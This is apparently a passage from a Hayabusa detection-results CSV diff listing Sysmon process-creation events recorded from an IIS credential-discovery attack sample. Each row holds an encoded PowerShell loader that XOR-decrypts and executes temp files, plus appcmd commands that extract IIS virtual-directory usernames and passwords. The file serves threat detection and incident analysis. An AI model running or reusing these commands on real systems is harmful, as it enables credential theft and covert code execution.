AF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 